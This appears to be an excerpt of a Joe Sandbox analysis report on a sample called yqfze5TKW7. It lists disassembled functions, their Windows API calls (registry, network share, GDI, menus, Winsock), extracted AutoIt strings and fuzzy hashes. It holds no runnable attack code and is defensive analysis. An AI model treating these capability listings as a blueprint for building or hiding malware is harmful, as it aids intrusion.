Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 7161209207e8dd3f55d1e7f3cea26547db3c43c09e13d3b585e96e1f986916a1
Instruction ID: dcd698efd014e09f63c77ca62c99a2f6fd678bd5bbae366254323a86c08e0516
Opcode Fuzzy Hash: 7161209207e8dd3f55d1e7f3cea26547db3c43c09e13d3b585e96e1f986916a1
Instruction Fuzzy Hash: A68182715043419FCB64FF64C844AAAB7EABF89310F184A2EF889D7391E630DD45CB62

Function 006AC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006AC1FC
GetFocus.USER32 ref: 006AC20C
GetDlgCtrlID.USER32(00000000), ref: 006AC217
_memset.LIBCMT ref: 006AC342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 006AC36D
GetMenuItemCount.USER32(?), ref: 006AC38D
GetMenuItemID.USER32(?,00000000), ref: 006AC3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 006AC3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 006AC41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006AC454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 006AC489

Strings

0, xrefs: 006AC33A

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 8f4da260ba047772c2f01a40eafbf9cfbbaa00d94ec3bd02f55c50f526635f88
Instruction ID: b39775455dc34053daba38c6f11c0d09777bfd6e6d03142153016613aad768d8
Opcode Fuzzy Hash: 8f4da260ba047772c2f01a40eafbf9cfbbaa00d94ec3bd02f55c50f526635f88
Instruction Fuzzy Hash: E1818D706083119FDB10EF54C894AABBBE6EF8A324F00492DF99597291D730DD05CF96

Function 0069731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0069738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0069739B
CreateCompatibleDC.GDI32(?), ref: 006973A7
SelectObject.GDI32(00000000,?), ref: 006973B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00697408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00697444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00697468
SelectObject.GDI32(00000006,?), ref: 00697470
DeleteObject.GDI32(?), ref: 00697479
DeleteDC.GDI32(00000006), ref: 00697480
ReleaseDC.USER32(00000000,?), ref: 0069748B

Strings

(, xrefs: 00697410

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 0c915af2e65bc5b096e85b2126d83b44a6f9ef50f34ffa9dca26502d71907096
Instruction ID: c7de040d1af855c3ede17a797a1fc1f40ba8ee7a9d3d9f34175309c2b6e5dbd3
Opcode Fuzzy Hash: 0c915af2e65bc5b096e85b2126d83b44a6f9ef50f34ffa9dca26502d71907096
Instruction Fuzzy Hash: 0A514875904209EFCB14DFA8CC84EAEBBBAEF49710F14842EF99997211C731A9418B50

Function 00626A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00640957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00626B0C,?,00008000), ref: 00640973

Part of subcall function 00624750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00624743,?,?,006237AE,?), ref: 00624770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00626BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00626CFA

Part of subcall function 0062586D: _wcscpy.LIBCMT ref: 006258A5

Part of subcall function 0064363D: _iswctype.LIBCMT ref: 00643645

Strings

Bad directive syntax error, xrefs: 0065E79D
AU3!, xrefs: 00626B61
Error opening the file, xrefs: 0065E43D, 0065E4B8
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0065E421
Unterminated string, xrefs: 0065E7E4
EA06, xrefs: 0065E452
>>>AUTOIT SCRIPT<<<, xrefs: 0065E496

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: ce4d5650af8961fe5c93944ec5b364d2c7541f0d4135dba2ac1c3eebbd2c19d8
Instruction ID: c7e37350dcd77ad0c2b054e7fc50afe3f9b34362e046f0390d219547f019c2e0
Opcode Fuzzy Hash: ce4d5650af8961fe5c93944ec5b364d2c7541f0d4135dba2ac1c3eebbd2c19d8
Instruction Fuzzy Hash: 2402BD305087519FCB64EF20D8819AFBBE6AF99314F10481DF88A972A1DB31DA49CF56

Function 00682D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00682D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00682DDD
GetMenuItemCount.USER32(006E5890), ref: 00682E66
DeleteMenu.USER32(006E5890,00000005,00000000,000000F5,?,?), ref: 00682EF6
DeleteMenu.USER32(006E5890,00000004,00000000), ref: 00682EFE
DeleteMenu.USER32(006E5890,00000006,00000000), ref: 00682F06
DeleteMenu.USER32(006E5890,00000003,00000000), ref: 00682F0E
GetMenuItemCount.USER32(006E5890), ref: 00682F16
SetMenuItemInfoW.USER32(006E5890,00000004,00000000,00000030), ref: 00682F4C
GetCursorPos.USER32(?), ref: 00682F56
SetForegroundWindow.USER32(00000000), ref: 00682F5F
TrackPopupMenuEx.USER32(006E5890,00000000,?,00000000,00000000,00000000), ref: 00682F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00682F7E

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: aa15c8293cf5bbfe8ec8c8eda86f1ee6ec7eeb7619048c2c37da970e277652cf
Instruction ID: 150ae6225c746aaf34ca88c60dfb7983d6d18c7ea5e77f9b47f32b163036dcda
Opcode Fuzzy Hash: aa15c8293cf5bbfe8ec8c8eda86f1ee6ec7eeb7619048c2c37da970e277652cf
Instruction Fuzzy Hash: A571D470640207BAEB21AF54DCA9FEABF66FF05314F100316F615AA2E1C7B16C50DB99

Function 006988AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006988D7
CoInitialize.OLE32(00000000), ref: 00698904
CoUninitialize.OLE32 ref: 0069890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00698A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00698B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,006B2C0C), ref: 00698B6F
CoGetObject.OLE32(?,00000000,006B2C0C,?), ref: 00698B92
SetErrorMode.KERNEL32(00000000), ref: 00698BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00698C25
VariantClear.OLEAUT32(?), ref: 00698C35

Strings

,,k, xrefs: 006988C1

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,k
API String ID: 2395222682-759674344
Opcode ID: abed942e34155f8acd1e78374f788a38d7720390d15996d5c2911e1979aecd44
Instruction ID: 473a515a705aca1102ef690c155d33b0ed20ea45e44c115751c9e745249268e0
Opcode Fuzzy Hash: abed942e34155f8acd1e78374f788a38d7720390d15996d5c2911e1979aecd44
Instruction Fuzzy Hash: FCC139B12043059FDB40EF64C88496BB7EAFF8A348F04491DF58A9B251DB71ED06CB52

Function 006777DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00627BCC: _memmove.LIBCMT ref: 00627C06

_memset.LIBCMT ref: 0067786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006778A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006778BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006778D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00677902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0067792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00677935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0067793A

Strings

\IPC$, xrefs: 00677882
SOFTWARE\Classes\, xrefs: 0067780C
\CLSID, xrefs: 00677822

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 44d544c80be2c434486897b1e98b112db5176925abb87bf9a8906d246e9533d2
Instruction ID: a0b5228a0c66af5d87e6acc5ff3c2c36366034b32ae2dd4e65ba0e1da5e56b52
Opcode Fuzzy Hash: 44d544c80be2c434486897b1e98b112db5176925abb87bf9a8906d246e9533d2
Instruction Fuzzy Hash: 18410872C14629ABCF21EFA4EC95DEDB77AFF04310F40446AE905A3261EA305E04CF95

Function 006A0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0069FDAD,?,?), ref: 006A0E31

Strings

HKEY_USERS, xrefs: 006A0F32
HKEY_LOCAL_MACHINE, xrefs: 006A0E9A
HKEY_CURRENT_CONFIG, xrefs: 006A0EEE
HKCR, xrefs: 006A0ED9
HKLM, xrefs: 006A0EAF
HKEY_CLASSES_ROOT, xrefs: 006A0EC4
HKCC, xrefs: 006A0EFF
HKEY_CURRENT_USER, xrefs: 006A0F10
HKCU, xrefs: 006A0F21
HKU, xrefs: 006A0F43

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 2234f9d7d1d2bdc78b8a5e466f668f396bf68c9f9b9853a9911576e6593d07cc
Instruction ID: 3cfa66d699c26fef9c5b231e9d6e7de37830377c6977015877a15b404c22a6e1
Opcode Fuzzy Hash: 2234f9d7d1d2bdc78b8a5e466f668f396bf68c9f9b9853a9911576e6593d07cc
Instruction Fuzzy Hash: EE415B3154025A8FEF60EF10E865AEE37A6BF12344F144469FC552B392DB30AD5ACFA0

Function 0067F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0065E2A0,00000010,?,Bad directive syntax error,006AF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0067F7C2
LoadStringW.USER32(00000000,?,0065E2A0,00000010), ref: 0067F7C9

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

_wprintf.LIBCMT ref: 0067F7FC
__swprintf.LIBCMT ref: 0067F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0067F88D

Strings

., xrefs: 0067F873
Line %d (File "%s"):, xrefs: 0067F833
Error: , xrefs: 0067F85B
Line %d:, xrefs: 0067F818
%s (%d) : ==> %s.: %s %s, xrefs: 0067F7F7

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 225eb152e753c70174592ef4819bad200f20193d5cc81a0e3928d6ce601133c5
Instruction ID: c5f5eb9d02cd97bca2fc74e0b833cfcb1e3b1ef787bab9532909492c4392353f
Opcode Fuzzy Hash: 225eb152e753c70174592ef4819bad200f20193d5cc81a0e3928d6ce601133c5
Instruction Fuzzy Hash: 7921713294022EEFCF51EF90DC4AEEE773ABF14300F04486AF515661A2DA71A618DF55

Function 006852C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00627BCC: _memmove.LIBCMT ref: 00627C06

Part of subcall function 00627924: _memmove.LIBCMT ref: 006279AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00685330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00685346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00685357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00685369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0068537A

Strings

alias PlayMe, xrefs: 00685309
play PlayMe wait, xrefs: 00685364
close PlayMe, xrefs: 00685341, 0068536E
open , xrefs: 006852DF
status PlayMe mode, xrefs: 0068532B
play PlayMe, xrefs: 00685375

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: b40e58722064f4aab533bb0f278657d3ed8ff16d24e259f54c3b99bf4e2c7ffe
Instruction ID: 9972bb2c13aae457afd13074b868a088861d100792c6111bd96dcb509b9a66a7
Opcode Fuzzy Hash: b40e58722064f4aab533bb0f278657d3ed8ff16d24e259f54c3b99bf4e2c7ffe
Instruction Fuzzy Hash: 8911B230E506697ED760BB71DC4ADFF7B7EEB92B40F00042AB402A31D1EEA05D45CAA1

Function 006846B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 006846D2
gethostname.WSOCK32(?,00000100), ref: 006846EC
gethostbyname.WSOCK32(?), ref: 006846F9
_wcscpy.LIBCMT ref: 00684721
_memmove.LIBCMT ref: 00684734
inet_ntoa.WSOCK32(?), ref: 0068473F
_strcat.LIBCMT ref: 0068474D
_wcscpy.LIBCMT ref: 00684764
WSACleanup.WSOCK32 ref: 00684772
_wcscpy.LIBCMT ref: 00684780

Strings

0.0.0.0, xrefs: 0068471B

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 0d7a751083cc08ae823e28dc1e0182f125dffe2a2f690c96a3d4d4daef051726
Instruction ID: 5ad640c265b9f1f02a3ed46c13a25cdc1ef3e0abc52d3620817330a629ce9725
Opcode Fuzzy Hash: 0d7a751083cc08ae823e28dc1e0182f125dffe2a2f690c96a3d4d4daef051726
Instruction Fuzzy Hash: 011127319041156FDB60BB709C4AEDA7BBEEF02711F0002BAF44592191EF75DD818B65

Function 00684F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00684F7A

Part of subcall function 0064049F: timeGetTime.WINMM(?,76C1B400,00630E7B), ref: 006404A3

Sleep.KERNEL32(0000000A), ref: 00684FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00684FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00684FEC
SetActiveWindow.USER32 ref: 0068500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00685019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00685038
Sleep.KERNEL32(000000FA), ref: 00685043
IsWindow.USER32 ref: 0068504F
EndDialog.USER32(00000000), ref: 00685060

Strings

BUTTON, xrefs: 00684FDE

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 720e610d5b6849ee562a6b425b3ec1afa4e3845336fdc4144ba23195327e4ef3
Instruction ID: 7e945b1b4e869473023c755d8bcbee4af2f45cffe6fcde85ad967e2fc1bf6aca
Opcode Fuzzy Hash: 720e610d5b6849ee562a6b425b3ec1afa4e3845336fdc4144ba23195327e4ef3
Instruction Fuzzy Hash: BD21A170600B45AFE7107FA0ECC8A363BABEB56785F043128F203862B1DB719D448B72

Function 0068D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00629837: __itow.LIBCMT ref: 00629862
Part of subcall function 00629837: __swprintf.LIBCMT ref: 006298AC

CoInitialize.OLE32(00000000), ref: 0068D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0068D67D
SHGetDesktopFolder.SHELL32(?), ref: 0068D691
CoCreateInstance.OLE32(006B2D7C,00000000,00000001,006D8C1C,?), ref: 0068D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0068D74C
CoTaskMemFree.OLE32(?,?), ref: 0068D7A4
_memset.LIBCMT ref: 0068D7E1
SHBrowseForFolderW.SHELL32(?), ref: 0068D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0068D840
CoTaskMemFree.OLE32(00000000), ref: 0068D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0068D87E
CoUninitialize.OLE32(00000001,00000000), ref: 0068D880

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 0dd859f5b1a83bf9721ca4493011df5dc14932b2f3e482cfdbe317e025f12354
Instruction ID: b273a5723015ef181279785f5a25d7156c3d44903568cb13b33055d1c82ec9c0
Opcode Fuzzy Hash: 0dd859f5b1a83bf9721ca4493011df5dc14932b2f3e482cfdbe317e025f12354
Instruction Fuzzy Hash: B4B1EA75A00119AFDB44EFA4C884DAEBBBAEF49304F148569F909DB261DB30ED41CF64

Function 0067C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0067C283
GetWindowRect.USER32(00000000,?), ref: 0067C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0067C2F3
GetDlgItem.USER32(?,00000002), ref: 0067C2FE
GetWindowRect.USER32(00000000,?), ref: 0067C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0067C364
GetDlgItem.USER32(?,000003E9), ref: 0067C372
GetWindowRect.USER32(00000000,?), ref: 0067C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0067C3C6
GetDlgItem.USER32(?,000003EA), ref: 0067C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0067C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0067C3FE

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 327f7aed521c79fa04d3ee8c8460044237c6ef537b2122fe9d81a409252e6934
Instruction ID: cd36b4940e1b8b84924e22b55f9020370e0be730167491cf798929c4012e1b40
Opcode Fuzzy Hash: 327f7aed521c79fa04d3ee8c8460044237c6ef537b2122fe9d81a409252e6934
Instruction Fuzzy Hash: DA515371B00205AFDB18DFA9DD89AAEBBB6EB88310F14912DF519D7290D770AD008B50

Function 0062201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

